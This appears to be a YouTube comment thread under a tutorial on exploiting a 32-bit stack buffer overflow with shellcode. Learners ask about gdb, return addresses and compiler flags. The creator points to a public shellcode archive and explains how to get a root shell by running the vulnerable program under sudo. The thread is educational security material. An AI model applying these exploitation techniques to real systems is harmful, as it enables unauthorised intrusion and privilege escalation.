    @thomasathanasiou1661 7 years ago +1

    Is there an assembly code that produces the shellcode that you used?

    • @danielslater
      @danielslater  7 years ago +1

      I don't have it readily available, but if you want, I'm sure you could convert it pretty quickly. Shellcode is the sort of thing that is good to write a few times to get an idea of what it actually is and what's happening, but most people just get stuff online because there really isn't any benefit to writing it yourself.
      If you want to look at example shellcode and the conversion then check out this link shell-storm.org/shellcode/files/shellcode-827.php

    • @shell2673
      @shell2673 5 years ago

      msfvenom

  • @toolsx8677
    @toolsx8677 5 years ago

    Hi Daniel, I am trying, but can someone please tell me where the memory address converted to little endian comes from? How did you get this address?

  • @mancubius
    @mancubius 3 years ago +1

    For what kind of architecture is this shellcode ?

    • @danielslater
      @danielslater  3 years ago +1

      TLDR: 32-bit x86
      Excellent question. When I made the video x86 was the dominant architecture, and it didn't seem like ARM was going to be anywhere near where it is today, so I didn't even think of other architectures. It's x86 on a 32-bit virtual machine running on a 64-bit Mac.

    • @mancubius
      @mancubius 3 years ago

      @@danielslater Wow, thank you for your prompt reply! I was testing it myself last night on Kali Linux 2020.4 64-bit.
      I am using Windows 10 64-bit on an Intel i9-9900K.
      I was also running in a virtual machine, so I was wondering: when I am looking for shellcode exploits, what should I look for? Do I need to install a 32-bit Linux? If I do so, do I need shellcode which targets the OS of the virtual machine?

  • @wolfcompany2
    @wolfcompany2 3 years ago

    (gdb) disas main
    No symbol table is loaded. Use the "file" command.
    I got this when I ran disas main.

  • @عمرإبنحومصمرمنهون
    @عمرإبنحومصمرمنهون 4 years ago

    Wow, thanks

  • @kooners6961
    @kooners6961 5 years ago

    So I got the -m32 to work, but I still can't insert breakpoint 1 and access the address.

  • @liviomichaelmelatti8236
    @liviomichaelmelatti8236 7 years ago

    Can I see a screenshot of what your shellcode looks like in memory? x/100xb 0xbfff070 or something like that, with the shellcode in there?

  • @jimmymouez7365
    @jimmymouez7365 7 years ago

    Thank you so much for the tutorial. I guess this tutorial won't work with new Ubuntu releases if they are 64-bit. Do you recommend I use Ubuntu 14? I was thinking of downloading Ubuntu 14.02 32-bit to be on the safe side. Please advise, thanks in advance.

    • @danielslater
      @danielslater  7 years ago

      The underlying mechanic of why this works will still be present in all Ubuntu releases for the foreseeable future. This can work with 64-bit, but you must use the compiler flag -m32 to force it to compile to a 32-bit program.
      If I were in your position I'd go for the 32-bit version, as you won't run into problems with that.

    • @jimmymouez7365
      @jimmymouez7365 7 years ago

      Thank you so much. I ran the experiment on Ubuntu 32-bit and it worked perfectly. The problem was that cdefs.h was missing in my 64-bit installation, although I downloaded the latest 64-bit release from Ubuntu, and I read in previous comments that others faced the same issue. I wanted to ask you: I executed the code on the shell (I copied it from gdb so that the memory doesn't move around). The program executed and opened a shell. I then gave chmod 777 to my C program; the program executed, but the shell I obtained was still under user, not root. I wanted to impress my professor by gaining root access. Is it feasible using this attack?

    • @danielslater
      @danielslater  7 years ago

      This hack can give you root, but the key thing to remember is that you receive the same privilege level that the program is running at. By default you're probably running it as user, but you can run it with sudo in front, which will make it run as root, and therefore after the buffer overflow you will have a shell with root.

    • @jimmymouez7365
      @jimmymouez7365 7 years ago

      Thank you so much :)

  • @liwaiyip1769
    @liwaiyip1769 5 years ago

    No matter how I change the value of 'A' * num to 250, 260 or 1000, I cannot obtain something like 0x41414141. It just shows some normal address like: 0xb7f26411 in __kernal_vsyscall().
    How should I proceed? :(

    • @moviez1794
      @moviez1794 4 years ago

      Hello! Have you got a solution to this problem? (Got the same.)

  • @droslean1
    @droslean1 7 years ago

    Hey Dan, nice example. But for me it's not working. I get:
    Program received signal SIGSEGV, Segmentation fault.
    0xf7e68929 in ptmalloc_init.part () from /usr/lib32/libc.so.6
    Any ideas?

    • @danielslater
      @danielslater  7 years ago

      Can you confirm that you used the compile line in the video description? I'm willing to bet that's a canary.

    • @droslean1
      @droslean1 7 years ago

      Yes. I compiled it that way.

  • @dejanahmetovic612
    @dejanahmetovic612 6 years ago

    Hello, while using GDB I am not able to see the function names on the right-hand side, ex. Any help on how to get that there?

    • @danielslater
      @danielslater  6 years ago

      So maybe what I've got there is a bit deceptive, because it's an exceptionally simple example. The reason strcpy comes up is because it's an inbuilt call; if you create your own function and call it, then you can't get the name from the executable because it's simply not stored (it's possible there are compiler flags you can use to get it to store them, but not that I know of).
      If you're interested in learning more about reverse engineering, I'd recommend doing an online course in it or writing your own simple programs and disassembling them to start seeing basic patterns. If you take the second approach, I'd recommend looking a bit more into compiler flags, because there can be tricks like inlining which could throw you off.

  • @gauravchauhan3832
    @gauravchauhan3832 3 years ago

    I tried your method, copied every step, but couldn't do it... Why so? Can anyone answer? Is gdb or gcc doing something? Or is there any other reason?

    • @danielslater
      @danielslater  3 years ago

      When asking for debugging help, it's useful if you include information about what commands you're running and whether anything about your setup is non-standard. Currently it's impossible to give you useful advice.

  • @alex595659
    @alex595659 8 months ago

    How do you know the return address?

  • @gordoburrito2951
    @gordoburrito2951 7 years ago

    What happens if the size of the buffer is smaller than the bytes of the shellcode?

    • @danielslater
      @danielslater  7 years ago

      Then you can't use that shellcode, so you'll either need shorter shellcode, use some of the already written code as part of your shellcode, or use another approach such as ret2libc.

  • @kylin3197
    @kylin3197 7 years ago

    What do you do if you try this for a different program and don't find a bunch of 41's?

    • @danielslater
      @danielslater  7 years ago

      Unfortunately this is out of the scope of this YouTube channel, as the answer gets extremely long extremely fast. A lot of security is knowing a lot of techniques for doing something and hoping one works, so I would suggest doing a full pen testing course.

  • @salimbelarbi1776
    @salimbelarbi1776 7 years ago

    Hello, I have an exam this Monday and I am completely lost, please! Can you answer my questions:
    Question 0
    What is the fault?
    What is the purpose of this service?
    Which versions are vulnerable?
    What version did you use?
    Question 1
    What protections against this attack
    Question 2 !!!
    Structure of the stack just before the overflow
    Question 3 !!
    Structure of the string sent to overflow
    Question 4 !!!
    Structure of the stack just after the overflow
    Question 5 !!
    Where does the new return address point? How is it determined?
    Question 6!
    What code is at this address
    Question 7!
    What happens to the Shell code?
    Question 8
    What does the Shell code do?
    Question 9
    What does your attack do?
    Which file is introduced on the victim?
    How?
    What action does this file take?
    How?

    • @mangoKush12
      @mangoKush12 7 years ago

      Salim BELARBI did you pass your exam??

  • @bhavitarunch5539
    @bhavitarunch5539 6 years ago

    I am getting "no such file or directory" when I use gdb ./example

    • @danielslater
      @danielslater  5 years ago

      Learning this type of security if you have no programming background is impossible. I'd strongly recommend learning some basic C before trying to broach low-level security.

  • @niektuytel7861
    @niektuytel7861 5 years ago

    A question: the /command, how is this working????

  • @mohamedwaellabidi9461
    @mohamedwaellabidi9461 2 years ago +1

    Add 2 eip

  • @jamessn91able
    @jamessn91able 3 years ago

    $esp doesn't work and neither does $rsp. I keep getting "No registers."

    • @dane887
      @dane887 3 years ago

      You have to quit after you copy. After you run blahblahblah, then you disas main. You get your number, copy, then quit. Open again, then break *yournumber.

  • @neoarthas7297
    @neoarthas7297 5 years ago

    I had a rough look.
    Thanks for the whole thing. I have a question: where did you open the socket to access the IP address?
    How do you connect (remotely) to that IP address and port of that software?

  • @niyazmurshed
    @niyazmurshed 8 years ago

    Hey, sorry to ask so many questions....
    I get the following after running....
    /bin/dash: 0: Can't open ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1��F1�1�̀�[1��C��C

    ��S
    �����/bin/sh����
    [Inferior 1 (process 9130) exited with code 0177]
    Any idea what could be the problem?

    • @danielslater
      @danielslater  8 years ago

      Are you running this in gdb?

  • @user-11528
    @user-11528 3 years ago

    Why is my machine code twice as long as yours?

  • @kooners6961
    @kooners6961 2 months ago

    Almost have it, but it just won't spawn.